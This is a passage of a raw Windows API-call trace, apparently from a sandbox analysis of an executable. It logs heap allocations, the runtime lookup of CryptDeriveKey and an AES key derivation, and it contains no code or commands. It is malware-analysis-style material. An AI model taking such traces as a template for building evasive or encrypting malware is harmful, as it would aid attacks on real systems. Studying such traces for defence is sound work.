hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.203] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0037.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.204] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.204] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.205] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf) returned 0x8897d8 [0037.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x8897d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.206] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDeriveKey") returned 0x754f3188 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.206] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.206] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.206] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.207] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.209] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0037.210] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.210] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.210] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.210] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a78 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0037.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) 